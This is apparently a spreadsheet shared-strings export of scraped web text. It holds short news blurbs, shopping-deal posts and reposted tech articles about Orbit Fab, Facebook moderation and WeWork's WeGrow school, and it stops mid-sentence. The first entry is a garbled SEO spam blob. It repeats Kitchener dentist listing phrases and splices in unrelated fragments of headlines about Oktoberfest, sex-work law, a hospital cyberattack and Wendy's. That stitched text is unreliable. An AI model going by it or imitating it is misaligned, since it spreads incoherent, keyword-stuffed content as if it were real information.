    <t>Homecoming Weekend: Football, street parties and bad behaviour – Some homeowners near Ezra Avenue also put up fences to keep students off their property. While the size of the crowd is the. Kitchener Dentist! City Smiles Dentistry is providing dental services to Kitchener, Waterloo &amp; nearby regions. Schedule an appointment with Dentist Rajdeep Gill Book an Appointment 519-576-9090 info@citysmilesdentistry.com Toggle navigation. Oktoberfest keg-tapping moves to new spot – KITCHENER — This year’s Oktoberfest keg tapping will take place in a new location. When the official opening ceremonies for. Does anyone actually like being a Dental Hygienist?. Dental Hygienist jobs forums. The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. Dentist never takes time to explain advancements in the industry and how it can help me 2. Staff are too busy to be friendly 1.They. . 1 Highland Hills Dental Kitchener &amp; Northfield Dental Waterloo 43-875 Highland Rd W, Kitchener, ON N2N 2Y2 Get directions View all addresses. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you Go Let us help you find the perfect dentist Go Best of 2019 – Dentists in Kitchener, ON. Locate and compare Dentists in Fairway Plaza Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Kid Friendly Dental Clinic In Kitchener Ontario Most Popular Dental Clinic Near Kitchener Ontario Highest Rated Dentist Near Kitchener Ontario Top Dentist In Kitchener Ontario Preferred Dental Clinic Near Kitchener Israeli bargain hunters flock to West Bank – A carton of L&amp;M cigarettes, his preferred brand, costs NIS 220 here compared with NIS 310 in Israel. We asked in a nearby. Cosmetic Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic In Kitchener Ontario Number 1 Dentist In Kitchener Ontario Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Find the best Dentist in Kitchener, Ontario. Discover Dentists reviews and contact details, including opening hours and phone numbers. Add a company Share Share Tweet Dentists in Kitchener, ON – Ratings &amp; Customer Reviews Canada Dentist Onta. 60 Ontario St N, Kitchener, ON N2H 4Y4 Phone Number 519-569-8338 Related Articles What causes a white tongue and is there a remedy for it? Dental Health. Highest Rated Dental Clinic Near Kitchener Ontario Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. Kitchener Post Reader Awards 2018-Best Dental Clinic (Diamond) – Waterloo Chronicle Reader Awards 2018 info@danubedental.com. . Friendliest Dentist Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Phone Number 519-569-8338 Related Articles What causes a white tongue and is there a remedy for it? Dental Health. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists in Kitchener. Dentist N2A 0A1 Kitchener (Show more) (Show less) Show more 13. Contact. . Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. Most Popular Dental Clinic Near Kitchener Whitening is among the most popular dental procedures because it can greatly improve how your teeth look. Teeth Cleaning. A Dental Clinic provides comprehensive dental care for everyone. Other General treatments include; Dental examination/. Top Dental Clinic Near Kitchener Ontario Dental hygienist deemed ‘sex abuser’ for cleaning wife’s teeth awaits law exemption – While working at a clinic in Guelph. "I can’t accept this as a person – not as a dental hygienist." Tanase is hoping. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Enamel Republic Family. Lancaster Dental General Dentistry 493 Street W -&gt; Source https://www.yelp.ca/biz/lancaster-dental-kitchener Fairway dental urgent care clinic kitchener dentists fairway dental emergency clinic kitchener ontario facebook fairway dental urgent. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. Number 1 Dental Clinic In Kitchener Ontario Find opening hours and closing hours from the Dentists &amp; Dental Clinics category in Kitchener, ON and other contact details such as address, phone number, website. Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Road South, Unit #203 Kitchener, Ontario, Canada N2C 2N9 519-893-9494 Emergency Dental Center – Waterloo 258 King Street North, Unit #7 Waterloo, Ontario, Canada, N2J 2Y9 519-883-0505. . Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you Go. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo families. We would love. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Rural southwestern Ontario hospitals struck by cyberattack – are the latest victims in a string of southwestern Ontario cyberattacks. The IT system of the Listowel. The hospital. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. "The ministry is aware that the College of Dental Hygienists of Ontario has submitted a proposed. While working at a. Ontario Kitchener Denturists in Kitchener 34 results for Denturists in Kitchener, ON Waterloo Denture Clinic (2.9 km) 132 Weber St N Waterloo, ON, N2J 4E7. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Number 1 Dental Clinic Near Kitchener Why should you choose dental implants – Only one. dental implants in the world you can get in the Near Eastern and Asian countries. Learn more about it here. Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. It is a hard task to bring adequate number of desired. searches for dental clinics near them, your website will be shown in the Google Map Local Pack. • If you optimize GMB properly, then, it will. Kid Friendly Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Find and compare reviews for Dentists in Kitchener, Ontario, Canada | de Man &amp; Höediono Dentistry, Fairway Dental Urgent Care Clinic, Dentistry in Waterloo, Boeri, Sorin DDS, Smile Town What: Where: For Companies Sign in / Sign up Add a. The friendly dental team at Kitchener Dental are delighted to welcome you. Let us make you feel right at home by showing you modern dental technologies and a gentle approach to general, KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. KW Dentists Toggle navigation Dentistry Services. Best Dental Clinic Near Kitchener Ontario Choose the best dentist in Waterloo &amp; Kitchener. We are a leading dental clinic in Waterloo offering trusted emergency dental care services to clients. Read this collection of the best obituary examples to help make writing easier. Includes examples of obituaries for mom, dad, children, grandparents &amp; military. International Student Handbook 2019/2020 | Conestoga College. Conestoga College Institute of Technology and Advanced Learning. This is a companion document to. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Enamel Republic Family. Region of Waterloo Public Health Breastfeeding Services Clinic: Public Health Breastfeeding Services is run by Public Health Nurses. This service offers one-to-one breastfeeding assessments, advice and referrals to community supports free of charge. Cosmetic Dentist In Kitchener Friendliest Dental Clinic In Kitchener Ontario Dave Thomas, founder of Wendy’s, loved the KewPee Burgers so much, he decided to make a similar restaurant chain. Wendy’s Old Fashioned Hamburgers was founded in 1969 in Columbus, Ohio. Thomas named the restaurant after his fourth child, Melinda Lou “Wendy” "The ministry is aware that the College of Dental Hygienists of Ontario has submitted a proposed. While working at a. Most Popular Dentist In Kitchener Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo. KITCHENER – A former Guelph dental hygienist who lost his licence. off work for almost three weeks since the Superior. Highest Rated Dentist Near Kitchener Number 1 Dentist In Kitchener Ontario Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Most Popular Dental Clinic Near Kitchener Ontario Kw Urgent care centre kitchener-waterloo, emergency medical services. We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. Best Dental Hygienists in Kitchener, ON – Lumi's Dental Hygiene Care, Champion Dental Hygiene, University Dental Hygiene Clinic, Huay-Leng Lee Dentistry, Mi Dental Yelp Find Near Cancel Log In Sign Up Restaurants Home Services Auto Services. Choose the best dentist in Waterloo &amp; Kitchener. We are a leading dental clinic in Waterloo offering trusted emergency dental care services to clients. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Enamel Republic Family. Kid Friendly Dentist Near Kitchener Ontario Fun Things to Do in Kitchener with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 2,128 traveler reviews and photos of kid friendly Kitchener attractions. Cambridge is the best place to call home, offering all you need in city conveniences with less smog, less crowding and more nature retreats – where river views, rolling hills, farmland and ravines contrast alongside modern shopping malls, trendy cafes, restaurants, art galleries, antiques and giftshops.Cambridge has the best of both worlds – old world historic architecture which is an. Fun Things to Do in Kitchener with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 2,133 traveller reviews and photos of kid friendly Kitchener attractions Kitchener Kitchener Tourism Kitchener Hotels Kitchener Bed. Home Ontario Elora Kid-Friendly Activities Things to Do with Kids in Elora, Ontario TripBuzz found 29 things to do with kids in or near Elora, Ontario, including 24 fun activities for kids in nearby cities within 25 miles like Kitchener, Cambrid. Murdoch Mysteries is a Canadian detective series set in late nineteenth- and early twentieth-century Toronto, based on a series of novels by Maureen Jennings.The series centers around William Murdoch, a detective in the Toronto constabulary with an interest in using then-unorthodox/unknown forensic techniques for catching criminals. Number 1 Dentist Near Kitchener Top Dentist Near Kitchener Ontario Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increas. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. The top rated &amp; reviewed dentists in Kitchener, ON. See below for which dentists are accepting new patients, their profile, credentials and clinic locations. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists Parada Dentures Dentist. . (CTV News Kitchener) "I have cleaned my. "I can’t accept this as a person – not as a dental hygienist." Tanase is hoping. Parolee’s massage therapy licence suspended over sex-abuse allegations – KITCHENER — A parolee who worked as a massage therapist has had his licence to practise suspended a second time. "The College of Massage Therapists of Ontario is investigating. allegations of harm, Near Me. All Male Female. All Verified Doctors Only. All Accepting New Patients. The Best Dentists in Kitchener, ON What is a Dentist? Dr. Stefan Ciz. Verified. Dentist. 25 reviews. Dr. Stefan Ciz’s Latest Rating. The staff used to be good and reasonable about 6 years ago. ©2004-2019 RateMDs Inc. – Find the Top Dentists 2 reviews of Highland Hills Dental "Went there for 3 years and each year they sent me a bill in the mail saying I didn't pay. Dentist Office Near Me Dentists That Accept United Healthcare Near Me General Dentistry Near Oops, looks. Only a third of the number of people who came out. may have hopped from city to city to choose one. There was also new. Kayak Rentals Near Me. Nothing is quite as fun as enjoying a day out on the water in the hot sun. One of the most popular ways to enjoy a day on the lake or on the ocean is by renting a kayak near me and heading out for a day trip or overnight adventure. Near-record homes sales in Kitchener-Waterloo in September: KWAR – Homes in the Kitchener-Waterloo market were changing hands at near-record pace in September. This marks the highest number.</t>
  </si>
  <si>
    <t>My Pet Warehouse has 20% off their Meals for Mutts and Meals for Meows range. Free delivery for all orders over $49 (or free Click and Collect) and if you sign up as a new member you will get another $10 off any order over $60. With the $10 off coupon, you can get some pretty decent prices for this food: - Meals for Mutts 20kg - From $111.99 (with the coupon, it comes further down to $101.99) - Meals for Mutts 9kg - From $61.59 (with the coupon, it comes further down to $51.59) Meals for Meows 20kg - From $111.99 (with the coupon, it comes further down to $101.99) Meals for Meows 9kg - - From $65.59 (with the coupon, it comes further down to $55.59)</t>
  </si>
  <si>
    <t>Claire Knox</t>
  </si>
  <si>
    <t>Hundreds of thousands of households in Japan are advised to evacuate as a powerful typhoon is set to make landfall, bringing with it the heaviest rain and winds in 60 years.</t>
  </si>
  <si>
    <t>Ukraine's President Volodymyr Zelensky has said a direct meeting must happen with Russian President Vladimir Putin in order to end a long-running "war" in the east of Ukraine.</t>
  </si>
  <si>
    <t>The Saskatchewan Roughriders are 7-1 on home turf but just 3-4 in away games in 2019.</t>
  </si>
  <si>
    <t>Doctors could be prevented from prescribing repeats of certain antibiotics as part of a crackdown on superbugs. The Pharmaceutical Benefits Advisory Committee is concerned automatic repeats are causing common infections to build a resistance to bacteria. GPs can issue repeat scripts for common antibiotics currently, even when repeats are not deemed therapeutically necessary. Under the changes, repeat prescriptions would no longer be subsidised on the Pharmaceutical Benefits Scheme. Image: Getty</t>
  </si>
  <si>
    <t>The council moved a motion to ban the climate activists from meeting in any pre-booked council facilities.</t>
  </si>
  <si>
    <t>In comments from the Oval Office, President Trump stood by his decision to withdraw U.S. troops from the Syrian border, and said it was up to other countries to fight ISIS now. Photo: Michael Reynolds/Shutterstock</t>
  </si>
  <si>
    <t>A fierce, wind-driven wildfire swept through foothills and canyons along the northern edge of Los Angeles on Friday, engulfing homes, closing roads and engulfing acre upon acre of dry brush and chaparral as 100,000 residents were forced to flee.</t>
  </si>
  <si>
    <t>A powerful storm approaching Japan is threatening to batter the capital Tokyo with the heaviest rain in 60 years, disrupting a Formula One Grand Prix and rugby's World Cup and raising fears of transport chaos.</t>
  </si>
  <si>
    <t>The Nasdaq stock exchange has listed an index of crypto’s top 100 coins alongside traditional market bellwethers like the S&amp;P 500 and the Dow. Powered by artificial intelligence, the CIX100 is designed by Cryptoindex.com to give Wall Street traders a quick and comprehensive view of the crypto markets’ real-time performance, the company said. The index had previously been listed by Reuters, Bloomberg and Tradingview. And it works without human intervention, according to Cryptoindex.com. The index’s “Zorax” algorithm trawls through data from over 1,800 tokens to develop a live account of the marketplace, free of inflated offerings. “We make sure our index includes only [coins] that have no fake volume, have no manipulation, that come from scrupulous companies,” Cryptoindex Project Manager Kirill Marchenko told CoinDesk. The CIX100 does so with layers of neural networks, benchmarks and other features, Marchenko said. Coins must remain among the top 200 by market cap for at least three months to be considered by the AI. The listing is another sign of crypto’s march toward the mainstream. “We’ve become a more accessible and convenient financial instrument for all types of investors, not only professional,” Marchenko said. Nasdaq image via Shutterstock</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/10/03/orbit-fab-gas-stations-in-space-seed-funding/ Orbit Fab raises $3M to make orbital refueling easier, cheaper and more accessible Orbit Fab, one of the companies competing in this year’s TechCrunch Disrupt Battlefield in San Francisco this week, has closed a seed round of $3 million. The funding comes from Type 1 Ventures, TechStars and others, and will help Orbit Fab continue to build on the great momentum it has already bootstrapped with its space-based robotic refueling technology. You might remember the name Orbit Fab from a milestone accomplishment the young company achieved earlier this year: Becoming the first startup to supply water to the International Space Station, itself an achievement but also a key demonstration of the viability of its technology for use in orbital satellite refueling. Refueling satellites could have tremendous impact on the commercial satellite business, extending the operating life of expensive satellites considerably, which translates to better margins and more profitable businesses. Thanks to co-founders Daniel Faber and Jeremy Schiel’s connections in the space industry, from more than 15 years working in space technology businesses in a leadership capacity, the company was able to demonstrate its technology working in space less than a year after Orbit Fab was actually founded. Faber, Orbit Fab’s CEO, and Schiel, the startup’s CMO, met when both were working at Deep Space Industries – Faber as CEO and Schiel as a contractor. Orbit Fab’s first space payload, the ISS water resupply robot. “We ended up reconnecting later on and really looking at a few different business models on how to push the industry forward,” Schiel said in an interview. “The one that really landed with customers, and the one that resonated with the industry was refueling satellites. Elon [Musk] has been making rockets reusable – we thought it’s time that we make satellites reusable as well.” Starting from this realization, the pair founded the company in January 2018. They then secured their first round of pre-seed investment from Bolt in San Francisco in June that year, and also landed two contracts – including one with NASA, and one with the International Space Station National Laboratory. “Basically in four-and-a-half months, we got flight-qualified and human-rated from NASA our two tanker test beds that we flew to the International Space Station in December 2018, and March of 2019,” Shield said. How did they do it with that speed? Faber credits their rapid progress largely to lead engineer James Bultitude, an accomplished space engineer with five payloads on the International Space Station already. “He took [the project] from a napkin through to flight hardware in four-and-a-half months,” Faber said. “All qualified to NASA human-rated safety standards, which was quite the feat. We really had to push hard on NASA.” Faber said that the company’s ability to spur the U.S. space agency into action has been a key driver of its success. In fact, he relayed a story in which their National Lab demonstration payload was actually left off of its intended flight, but the team was able to get its cargo approved by top NASA decision-makers over the course of a weekend and just barely made the cut as a result. As for working with NASA as a startup, Faber said that it’s become a very different affair, with the agency eager and adapting to working more with younger companies and startups bringing a different pace of innovation to the field. “The change is almost palpable on the phone with NASA – you can almost hear them changing,” he said. At Disrupt, Orbit Fab demonstrated their robotic connector for refueling on stage for the first time. The idea is that satellite makers will build their standard nozzles into their designs, and then a robotic refueler will be able to seek out the nozzle, open and then close on to the coupler, forming a solid connection to allow propellant transfer. Already, Orbit Fab is talking to partners, including Northrop Grumman, and it’s a member of the Consortium for Execution of Rendezvous and Servicing Operations (CONFERS), an industry group that aims to make robotic service and maintenance of satellites a viable reality. Source: https://techcrunch.com/2019/10/03/orbit-fab-gas-stations-in-space-seed-funding/ The post Orbit Fab raises $3M to make orbital refueling easier, cheaper and more accessible appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>U.S. Secretary of State Mike Pompeo, who was in Greece for the last leg of a European tour, said it's too early to know if talks in Stockholm on Saturday will yield progress but he was hopeful they would.</t>
  </si>
  <si>
    <t>One person is dead following a collision on Highway #1 near Moose Jaw, Sask. Wednesday afternoon, according to RCMP.</t>
  </si>
  <si>
    <t>Interviews, news and analysis of the day’s global events.</t>
  </si>
  <si>
    <t>WARNING: Grapic content</t>
  </si>
  <si>
    <t>WINNIPEG – Nearly 21,000 Manitoba homes and businesses remained without power early Monday in the wake of a snowstorm that the province’s Crown energy utility said had left an unprecedented amount of damage to transmission lines, towers and more, and… The post Unprecedented snowstorm leads to state of emergency in Manitoba appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Greg Gazin</t>
  </si>
  <si>
    <t>At a mere 28.8 x 17.1 x 3.0 inches, the TCL 32” Roku Smart LED TV (32S327-CA) fits and goes almost anywhere. It’s so slim and light (under 10 pounds) it can literally be carried under your arm or popped it into the trunk of your car. The TCL 32” Roku Smart LED TV is build by China-based TCL, the world’s third largest TV manufacturer, and is new this year to the Canadian TV scene. It’s a low-cost, full high-definition (FHD) TV equipped with many of the features typically found in larger higher-priced models.Within the unpretentious black housing is a crisp 32-inch FHD (1080p) LED widescreen display, great for watching movies and playing games. It’s equipped with dual-band 802.11ac Wi-Fi, perfect for feeding our insatiable hunger for Netflix and YouTube. Externally, it has one USB port, which you can also use with a USB stick to add Pause Live TV functionality (although two should be standard to reduce the need to unplug and plug other devices), three HDMI ports to connect external devices and coax cable connector. The headphone jack allows for quiet listening or can be used to hook up an external speaker and a digital audio output. A composite video jack with cable completes the row to connect any older analogue devices. It is also the perfect solution for cord cutters. You can plug in a digital HD antenna to capture free over-the-air TV channels but, as the name implies, a Roku streamer is built right in, so you don’t need to connect one externally. Roku offers access to literally thousands of streaming channels that feature 500,000+ movies, TV shows, live sports, music and more. Some are free; others require paid subscriptions. TCL Roku Main Screen The beauty of this TV is its simplicity. It starts with an easy step-by-step on-screen set-up. Gone are any complicated menus. Both the TV’s functionality and Roku’s streaming services are integrated into a single intuitive interface, making it easy to navigate with one simple remote with one touch access to services like Netflix and Google Play. You can also use the Roku app for smartphone or tablet as a remote for voice or keyboard search. Other features include mirroring, which allows you to watch media from your smartphone, tablet or PC on your TV. Guest mode is perfect if you run an AirBnB; it allows you to restrict access while guests can sign on using their own accounts. Simplified Roku remote with one touch buttons Adjusting your TV’s picture no longer requires fussing with various controls. Simply access the picture settings menu and select from: Dark, Darker, Normal, Bright and Brighter. And as long as you have an Internet connection, the Software Auto Update feature checks for updates every 24 to 36 hours to ensure your system is always up-to-date. But while this model has many great features, tradeoffs are inevitable (especially for those who like all the bells and whistles) considering the model’s simplicity, size and cost. The TCL uses the basic Roku remote, which has no numeric keypad for direct access to a channel nor a voice search button found on the top-line Roku players. There’s also no Ethernet port for a hardwired Internet You can’t fine-tune the picture and colour, as on other TVs. There’s no support for HDR (High-Dynamic Range) or 4K resolutions. For smoother blur free images and a better gaming experience, the stated screen refresh rate of 120Hz CMI (Clear Motion Index) is simulated using advanced techniques but not true 120Hz. And while not a deal-breaker, that second USB port should be standard. Although the TCL 32” truly shines (pardon the pun) in a dimly-lit room, the viewing experience in a brightly lit or exremely dark room was average, obviously due to the lack of any automatic ambient light sensors. Text from show descriptions can also seem small if the TV is placed far away, but this is likely true of most models of that size. Overall, however, especially for its size and price, I was fairly impressed after test-“viewing” this TV for a few weeks. The built-in Roku is and added bonus, making this model ideal for anyone looking for a user and budget-friendly solution for a small space. The TCL 32” Roku Smart LED TV (32S327-CA) retails in Canada for $219.99 on Amazon and at your local Best Buy. (Note: The TCL 32S327 should not be confused with other 32-inch 3-series models. Some are older and albeit lower cost, but also lower resolution (not full HD), lower refresh rate and not necessarily the most current Wi-Fi standard. ) Troy Media columnist Greg Gazin, also known as the Gadget Guy and Gadget Greg, is a syndicated veteran tech columnist, communication, leadership and technology speaker, facilitator, blogger, podcaster and author. Reach him @gadgetgreg or at GadgetGuy.ca. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Low cost TCL 32” Roku Smart LED TV simplicity itself appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>A revision to the temporary tariff regime that would take effect in a no-deal Brexit could mean some clothing prices going up. Read more? Click here</t>
  </si>
  <si>
    <t>Farrah Tomazin</t>
  </si>
  <si>
    <t>The boss of one of Victoria’s major domestic violence services has resigned after a state government review uncovered “serious concerns” with the way victim support grants had been handed out by the organisation.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/interface/2019/10/3/20895119/facebook-men-are-trash-hate-speech-zuckerberg-leaked-audio Why you can’t say ‘men are trash’ on Facebook Photo by Amelia Holowaty Krales Yesterday we published transcripts from open question-and-answer sessions that Mark Zuckerberg held with his employees in July, along with selected audio excerpts from his answers. I tried to present the highlights of Zuckerberg in as neutral a fashion as possible — I had found them quite newsworthy, if not quite “explosive” in the way that people sometimes assume any leaked audio must be. But as you may have seen from the resulting coverage, within about 10 seconds of the story hitting Twitter, the story became “Facebook CEO slams Elizabeth Warren.” The truth was somewhat less dramatic — a presidential candidate had proposed her intention to break up a large business, and the business CEO promised to fight back against that proposal —… Continue reading… Source: https://www.theverge.com/interface/2019/10/3/20895119/facebook-men-are-trash-hate-speech-zuckerberg-leaked-audio The post Why you can’t say ‘men are trash’ on Facebook appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>On the anniversary of the first appearance of the campaign tool on our screens, we look at their impact. The post Do party election broadcasts matter any more? appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/191012/p2#a191012p2 Stories of three fundraising campaigns that illustrate the complexities of the GoFundMe ecosystem, where 50M people have donated $5B+ through 2017 (Rachel Monroe/The Atlantic) Rachel Monroe / The Atlantic: Stories of three fundraising campaigns that illustrate the complexities of the GoFundMe ecosystem, where 50M people have donated $5B+ through 2017 — in june 2016, Chauncy Black rode the bus from his home in South Memphis to one of the city’s whiter, wealthier neighborhoods. Source: http://www.techmeme.com/191012/p2#a191012p2 The post Stories of three fundraising campaigns that illustrate the complexities of the GoFundMe ecosystem, where 50M people have donated $5B+ through 2017 (Rachel Monroe/The Atlantic) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Most of our clients want an unforgettable yacht experience but simply don’t have the time to deal with the details of planning the trip or event on their own. That’s why they leave it to us. We are Miami’s #1 choice for unforgettable, one of a kind luxury lifestyle experiences, with VIP services at the […] The post Prime Luxury Rentals CEO's Interview – Yacht Charters appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Cellmate</t>
  </si>
  <si>
    <t>Limit of 2 per customer. Only 100 sims in stock. Activate on a plan that is best suited to your needs Optus Prepaid Epic Data -35GB standard data on first three Optus Prepaid Epic Data recharges. After 3rd recharge, $30 recharge gives you 10GB standard data. First three recharges must occur within 90 days of activation. Plus up to 10GB streaming data only on Netflix, Stan, ABC iView, ABC Kids and ABC ME. Charged per KB. Positive MyData balance and subscriptions required. Data on first three recharges applies for new customers. -EXPIRY EXTENSION Recharge before expiry and any remaining days will roll over to your new recharge with expiry extension up to 84 days. DATA ROLLOVER -Up to 200GB when you recharge before expiry. Streaming data does not roll over. -UNLIMITED TALK &amp; TEXT Unlimited calls to standard national numbers, 13/1300 numbers and Voicemail. Unlimited standard national SMS and MMS. -UNLIMITED INTERNATIONAL CALLS: Unlimited standard international calls from Australia to Canada, mainland China, France, Germany, Hong Kong, India, Ireland, Japan, Malaysia, New Zealand, Singapore, South Korea, Sweden, UK and USA. -$5 EXTRAS CREDIT For international calls and messages, roaming and selected premium SMS services. This starter kit can also be activated on other prepaid plans and full information of the same can be found by clicking the link below http://offer.optus.com.au/shop/prepaid/sim-card/30-sim Friends if we run out of stock please subscribe to the product and get notified once stock is available</t>
  </si>
  <si>
    <t>graceyym</t>
  </si>
  <si>
    <t>I noticed this great deal while I was at Woolies yesterday! I use Dry Shampoo a lot so this was perfect for me, and I'm sure others as well. They have all the varieties available, and in store was well stocked when I went. If you order online, you can get 2.5% cashback via Shopback!</t>
  </si>
  <si>
    <t>Yaqinda BOEING o'zining ajoyib F-15 qiruvchi samolyotining yangi versiyasini namoyish etdi va uni 21-asr ehtiyojlariga javob beradigan samolyotga aylantirish maqsadida […] The post F 15X SUPER EAGLE Eng yaxshi F-15 hech qachon yaratilgan? appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Japan's Prime Minister is urging typhoon shelters to open their doors to everyone after two homeless people were turned away during the country's devastating storm. The two men were refused entry in Tokyo because they didn't have a permanent address. At least 72 people have been killed after Typhoon Hagabis made landfall, and rescue crews are searching through mud and debris for survivors. At least 138,000 homes are without water, and 24,000 have no electricity. Image: Getty</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/m1bVG1PIzQ8/wework-closes-wegrow-rebekah-neumanns-school-effort-2019-10 WeWork’s school is closing at the end of the academic year as the company ditches passion projects to stem its huge losses WeWork is closing WeGrow, its educational arm, at the end of the school year as the coworking company’s new leaders look to right the ship after a failed IPO. Rebekah Neumann had overseen WeGrow, which had about 100 students and cost up to $42,000. One WeGrow parent not linked to the Neumanns talked to Business Insider about how he viewed the school for his three kids, and what he’s thinking now that the school is set to close. For more WeWork stories, click here. WeWork is shuttering its WeGrow school as the company continues to close and spin out businesses under new leadership after a failed IPO. The office company piloted the school with a handful of students two years ago. Last year, it opened WeGrow, led by Rebekah Neumann as CEO, in WeWork’s New York headquarters. Tuition at the school, which has about 100 students enrolled, ranges from $22,000-$42,000, depending on the child’s age. The Huffington Post first reported WeGrow’s closing on Friday. See more: Sex, tequila, and a tiger: Employees inside Adam Neumann’s WeWork talk about the nonstop party to attain a $100 billion dream and the messy reality that tanked it After a tumultuous lead-up to an initial public offering that was ultimately shelved, Rebekah Neumann stepped down from WeGrow last month as part of a slew of leadership departures. Her husband, WeWork co-founder Adam Neumann, left his job as CEO but has stayed on as non-executive chairman. New co-CEOs Artie Minson and Sebastian Gunningham are re-focusing the company by shedding businesses, slashing thousands of jobs and offloading the Gulfstream G650 jet the Neumanns used. WeWork’s precarious financial position could be shored up with a $5 billion debt package the company is discussing with JPMorgan, Bloomberg reported Friday. A WeWork representative said in a statement that WeGrow will close at the end of the academic year. “As part of the company’s efforts to focus on its core business, WeWork has informed the families of WeGrow students that we will not operate WeGrow after this school year. WeWork and the families of WeGrow students are engaging in discussions with interested parties regarding plans for WeGrow for the following school year,” the WeWork representative said. The curriculum: mentoring, farming, and more Rebekah Neumann had big plans for WeGrow, starting with an elementary school in New York that she planned to be a model for how education could fit in at WeWorks around the world. In the company’s August filing to go public, WeWork said “we also expect to expand our education and learning programs to broaden the reach of our grow mission.” The school had not yet expanded beyond New York, where children would learn both inside the Chelsea headquarters and at the Neumanns’ 60-acre farm north of the city. See more: WeWork’s Rebekah Neumann insists that all technology she uses is white-colored, and her assistants once had to break apart her phone, spray paint all the pieces, and put it back together for her One WeGrow parent, Raj Gupta, has three children in WeGrow, he told Business Insider last month before the company’s leadership changes. He did not have a prior relationship with WeWork or the Neumanns, and said his family first applied for the school after reading about it in the New York Times. Gupta said he and his wife, who is a Yale- and Harvard-trained child psychologist, were drawn to WeGrow’s philosophy of combining education with nurturing children through community and mindfulness efforts like yoga. As an entrepreneur, Gupta also liked the school’s focus on building future business leaders and cultivating kids’ interests. “Some people like technology, some people like baking, some people like sports,” he said. “We felt in the traditional school setting, if it didn’t fit the mold of the school, those things go to die.” On occasion, WeWork employees and entrepreneurs who rented office space from the company taught lessons. Adam Neumann led a workshop on supply and demand, Business Insider reported in 2017. The elementary school students could also link up with WeWork customers to be mentors. One of Gupta’s children is interested in polar bears, 